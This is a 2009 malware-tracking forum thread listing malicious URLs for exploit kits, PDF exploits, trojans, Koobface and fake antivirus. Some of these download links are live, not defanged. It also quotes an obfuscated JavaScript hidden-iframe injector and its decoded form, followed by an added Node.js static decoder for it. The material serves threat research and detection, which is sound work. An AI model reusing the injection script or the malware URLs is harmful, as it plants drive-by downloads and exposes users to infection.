Author Topic: daily something......  (Read 797415 times)


May 02, 2009, 10:50:16 am
Reply #375

Malware-Web-Threats

redirects to exploits:
Code: [Select]
hxxp://tds4self.com/sutra/in.cgi?3Wepawet

exploits:
Code: [Select]
hxxp://webcom-software.net/links/?
hxxp://monkey-squad.net/monkey/index.php
hxxp://monkey-squad.net/monkey/spl/pdf.pdf
hxxp://bronotak.cn/phpmyadmin/index.php?
hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
Wepawet
Wepawet
Wepawet
Wepawet
Wepawet

trojan:
Code: [Select]
hxxp://monkey-squad.net/monkey/exe.php
hxxp://qwu11a.biz/cpanel/exe.php
VirusTotal - 27/40 (67.5%)
VirusTotal - 11/40 (27.5%)

May 03, 2009, 11:52:03 am
Reply #376

CkreM

Exploit/trojan:
Code: [Select]
carpena.co.uk/cmweb/print/pdf.php
http://wepawet.iseclab.org/view.php?hash=7e78a387e1c5eac47bd34922f4cef85f&t=1241336475&type=js

Koobface: (goes on and off all the time)
Code: [Select]
86.108.36.203/setup.exe
99.50.245.81/setup.exe
http://www.virustotal.com/analisis/bd22d575927bfbf1103713d8718c3a90

Redirects to exploits:
Code: [Select]
freak-vkontakte.biz
contains an iframe to
Code: [Select]
http://basesrv3.net/bin/in.php
which is on MDL
wepawet gives Invalid hostname on this domain.
http://jsunpack.jeek.org/dec/go?url=freak-vkontakte.biz
Mal-Aware

May 03, 2009, 03:21:16 pm
Reply #377

CkreM


May 04, 2009, 06:53:02 am
Reply #378

CkreM


May 04, 2009, 02:54:35 pm
Reply #379

SysAdMini

Ruining the bad guy's day

May 04, 2009, 04:49:07 pm
Reply #380

Malware-Web-Threats

Redirects to fake codec page
Code: [Select]
hxxp://rhianna.name/vidd/
Wepawet
Fake codec page
Code: [Select]
hxxp://tubecollection2009.com/xxplay.php?id=40009
Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exe
VirusTotal - 10/40 (25%)
Anubis
ThreatExpert

downloads:
Code: [Select]
hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg
hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gif
hxxp://pictureswall.com/werber/109/216.jpg
VirusTotal - 28/40 (70%)
Anubis
ThreatExpert

VirusTotal - 22/40 (55%)
Anubis
ThreatExpert

VirusTotal (216.jpg - bb.jpg) - 14/40 (35%)
Anubis
ThreatExpert

perce.jpg
HTTP Conversations:
Quote
216.240.157.91:80 - [imagesrepository.com]
POST /resolution.php
88.214.205.8:80 - [zone-searching.com]
POST /borders.php

item.gif
HTTP Conversations:
Quote
216.240.157.88:80 - [last-visit.com]
GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOCQMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSbApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaMwb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOCQMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSbApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaMwb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..

May 04, 2009, 05:13:31 pm
Reply #381

SysAdMini

Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exe
VirusTotal - 10/40 (25%)
Anubis
ThreatExpert

see also:

xxx-softwares.com
cool-softtech.com
rtfm-softweares.com
xyu-softportal.com
xepace-software.com
ce-softwares.com
dig-softportals.com
pac-softportal.com

May 04, 2009, 05:56:07 pm
Reply #382

Malware-Web-Threats

This IP hosts similar websites with the same payload: http://www.robtex.com/ip/195.88.80.41.html

It can be downloaded using "/softwarefortubeview.40007.exe", "/softwarefortubeview.40008.exe", etc.

Code: [Select]
hxxp://xxx-softwares.com/softwarefortubeview.40009.exe
hxxp://cool-softtech.com/softwarefortubeview.40009.exe
hxxp://rtfm-softweares.com/softwarefortubeview.40009.exe
hxxp://xyu-softportal.com/softwarefortubeview.40009.exe
hxxp://xepace-software.com/softwarefortubeview.40009.exe
hxxp://ce-softwares.com/softwarefortubeview.40009.exe
hxxp://dig-softportals.com/softwarefortubeview.40009.exe
hxxp://pac-softportal.com/softwarefortubeview.40009.exe

Quote
File size: 65536 bytes
MD5...: b179b7959a87bd316d7f7f11a993e037

VirusTotal


May 04, 2009, 06:08:54 pm
Reply #383

Malware-Web-Threats

They also have the same structure with "promo.exe":

Code: [Select]
hxxp://xxx-softwares.com/promo.exe
hxxp://cool-softtech.com/promo.exe
hxxp://rtfm-softweares.com/promo.exe
hxxp://xyu-softportal.com/promo.exe
hxxp://xepace-software.com/promo.exe
hxxp://ce-softwares.com/promo.exe
hxxp://dig-softportals.com/promo.exe
hxxp://pac-softportal.com/promo.exe

Quote
File size: 74752 bytes
MD5: 951f3ee90eb3576325fa1920e3da678c

VirusTotal - 29/39 (74.36%)
Anubis
ThreatExpert

HTTP Conversations:
Quote
216.240.148.9:80 - dfdsfdsfcdsc.com
Request: GET /bbb.php
Request: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513

May 05, 2009, 01:29:03 am
Reply #384

Malware-Web-Threats

related: teyrebuf[.]cn, gukgifoc[.]cn, beelposttraning[.]ru, dastrealworld[.]ru

redirects to exploits:
Code: [Select]
hxxp://dastrealworld.ru/denunreal.html
Wepawet

the script that came with this one
Quote
<script>
document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));
</script>
<script>
eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));
</script>

the iframe:
Quote
<style type="text/css"> iframe {width:0;height:0;border:0;} </style>

var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));

Found here:
http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js

others on the same site:

Code: [Select]
hxxp://dastrealworld.ru/underworld.html
hxxp://dastrealworld.ru/cover.html
Wepawet
Wepawet

pdf exploits:
Code: [Select]
hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
Wepawet
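
As an added example (this is not code from the original post or from MalwareURL), the Node.js script below statically peels the unescape() / String.fromCharCode() layering of the script quoted above, the way an analyst would before trusting a sandbox verdict: it never calls eval(), it percent-decodes the literals, resolves the fromCharCode number list arithmetically, and reports the two things worth alerting on, the zero-size iframe CSS and the iframe target. The two <script> bodies from the post are embedded as constructed sample input; the function and constant names are this example's own. It goes a little beyond the single-layer case in the post by peeling nested unescape() layers up to a fixed depth.

```javascript
// Added example (not code from the original post): static decoder for the
// unescape() / String.fromCharCode() layering quoted above. Nothing here is
// eval()'d; literals are percent-decoded and the number lists resolved by hand.

// Constructed sample: the two <script> bodies quoted in the post, verbatim.
const SAMPLE_SCRIPT = [
  '<script>',
  'document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));',
  '</script>',
  '<script>',
  'eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));',
  '</script>',
].join('\n');

// Emulate the legacy unescape(): %XX and %uXXXX sequences only.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Every string literal handed to unescape(...) in a piece of text.
function unescapeLiterals(text) {
  const re = /unescape\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;
  const found = [];
  let m;
  while ((m = re.exec(text)) !== null) found.push(m[2]);
  return found;
}

// Peel unescape() layers breadth-first; MAX_DEPTH guards against scripts
// that nest decoys forever. Each decoded layer is kept for inspection.
const MAX_DEPTH = 8;
function decodeLayers(script) {
  const layers = [];
  let frontier = [script];
  for (let depth = 0; depth < MAX_DEPTH && frontier.length > 0; depth++) {
    const next = [];
    for (const text of frontier) {
      for (const lit of unescapeLiterals(text)) {
        const decoded = percentDecode(lit);
        layers.push(decoded);
        next.push(decoded);
      }
    }
    frontier = next;
  }
  return layers;
}

// Resolve String.fromCharCode(104,116,...) lists to the strings they build.
function fromCharCodeStrings(code) {
  const re = /String\.fromCharCode\(\s*([0-9\s,]+?)\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(code)) !== null) {
    const codes = m[1].split(',').map((x) => parseInt(x, 10)).filter(Number.isInteger);
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// CSS that collapses iframes to zero size is the classic invisible-injection tell.
function hasHiddenIframeStyle(text) {
  return /iframe\s*\{[^}]*\b(width|height)\s*:\s*0\b/i.test(text);
}

// Decode everything and extract iframe targets, whether the src is a plain
// quoted literal or (as in the sample) a variable built from fromCharCode.
function analyze(script) {
  const layers = decodeLayers(script);
  const targets = new Set();
  for (const layer of layers) {
    const direct = /<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
    let m;
    while ((m = direct.exec(layer)) !== null) targets.add(m[1]);
    if (/<iframe\b/i.test(layer)) {
      for (const s of fromCharCodeStrings(layer)) {
        if (/^https?:\/\//i.test(s)) targets.add(s);
      }
    }
  }
  return {
    layers,
    hiddenIframeStyle: layers.some(hasHiddenIframeStyle),
    iframeTargets: [...targets],
  };
}

console.log(JSON.stringify(analyze(SAMPLE_SCRIPT), null, 2));
```

Run with `node decode.js`; for the sample it reports two decoded layers, `hiddenIframeStyle: true`, and the single target `http://dastrealworld.ru/denunreal.html`, which is exactly what the post's Wepawet link shows. The fromCharCode fallback only fires when the decoded layer actually contains an `<iframe` tag, so an unrelated fromCharCode string elsewhere in a page is not reported as an injection target.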

May 05, 2009, 10:00:25 am
Reply #385

RS-232

Quote
hxxp://totalweightlosscenter.com/images/go.php?sid=1
hxxp://nikolaevere.com/images/data/load.php
- - - - - - - - - - -
Pharmacy crap:
http://www.robtex.com/ip/203.117.111.123.html
- - - - - - - - - - -
Hadn't seen this lame trick in quite some time...
Quote
hxxp://www.mediapartner.by.ru/bunners/banunicom.gif
http://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bb
Result: 7/40 (17.5%)
- - - - - - - - - - -
Quote
hxxp://update.dom11z.cn/cache/readme.pdf
http://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e

Interesting IP... lots of domains that seem to redirect to update.dom11z.cn above, one way or another:
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.230#result
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

May 05, 2009, 01:55:10 pm
Reply #386

RS-232

From the 213.182.197.2xx neighbourhood again...

Quote
hxxp://hostyapics.com/video/988/install_flash_player.exe
http://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8b
Result: 4/40 (10%)
http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html
---->
hxxp://members.chello.pl/i.lemecha/index1.gif
http://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697
Result: 4/39 (10.26%)
http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html
--->
(Anubis results in short... I've commented only the ones that have a somewhat lousy detection rate):
hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557
hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.php
hxxp://adimsceibh.com/progs/eqkxyll/bueesf.php
hxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.php
hxxp://adimsceibh.com/progs/eqkxyll/fczzm.php
hxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.php
hxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinch
hxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo

May 06, 2009, 07:01:34 am
Reply #387

CkreM

PDF exploits (all the same, on IP 91.212.41.119):
Code: [Select]
nicdaheb.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=d0151c3192d10713487fff545fab19ff&t=1241590847&type=js
Code: [Select]
sehmadac.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=e0ee4d85cd32c9d38378686a65413636&t=1241591188&type=js
Code: [Select]
vavgurac.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=de5856cb0d29edcbf0151722249c73f8&t=1241591259&type=js
Code: [Select]
tixleloc.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=614e78b7f2bf16d7fc76ebfd876e57d5&t=1241591442&type=js
Code: [Select]
teyrebuf.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=371a870529fc3101c03eeee07e93124c&t=1241591523&type=js
Code: [Select]
tukhemaj.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=251584c0c643dcfe6ba8ec2842547b76&t=1241591544&type=js
Code: [Select]
tixwagoq.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=aee55ad675950b610765dc60a7772a9d&t=1241591577&type=js

all lead to this trojan:
Code: [Select]
nicdaheb.cn/nuc/exe.php
http://www.virustotal.com/analisis/3b2a31a93f84f0b540f14abbe54a89e0

Rogue:
Code: [Select]
antivguardian.com
antiawarepro.com
antivirprof.com

Fake AV:
Code: [Select]
stats.swpstats.com/getfile?id=26
http://www.virustotal.com/analisis/ed4436020c7fe8208e13d0b19cda10db

Fake AV:
Code: [Select]
free-webscaners.com/scan

Koobface:
Code: [Select]
64.4.224.45/setup.exe
69.154.143.170/setup.exe
75.54.183.125/setup.exe
62.98.53.173/setup.exe
74.216.59.250/setup.exe
http://www.virustotal.com/analisis/6914e7738d5af094ac7105a4aa087a60

Trojan:
Code: [Select]
http://down.yyduowan.net/2.exe
http://www.virustotal.com/analisis/b008ea75feb56250e0124be694180c2d

Trojan:
Code: [Select]
svarkon.ru/update.exe
http://www.virustotal.com/analisis/f8f886d3907495a15f08d982bbae11b2

May 06, 2009, 08:42:15 am
Reply #388

XiTri

Code: [Select]
http://72.29.67.139/knb/megatrader-2k_20090505.exe

http://vilko.biz/opi/index.php
http://vilko.biz/opi/load.php
http://vilko.biz/opi/cache/readme.pdf

http://vilko.biz/myy/index.php
http://vilko.biz/myy/load.php
http://vilko.biz/myy/cache/readme.pdf

May 06, 2009, 09:35:28 pm
Reply #389

CkreM

Exploit: (downloaded file on MDL)
Code: [Select]
liteautobestguide.cn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=66fec491755fc72f675563dd6c4fc20a&t=1241645815&type=js

Also a trojan on that domain:
Code: [Select]
liteautobestguide.cn/load.php
http://www.virustotal.com/analisis/bfbac430fbb0fb3096239b7c98d384ac

Koobface:
Code: [Select]
65.75.82.150/setup.exe
98.203.149.224/setup.exe

Trojan:
Code: [Select]
qqcfwaigua.com/cfwg.exe
http://www.virustotal.com/analisis/7403d735e83451ef65863b15b832d9ae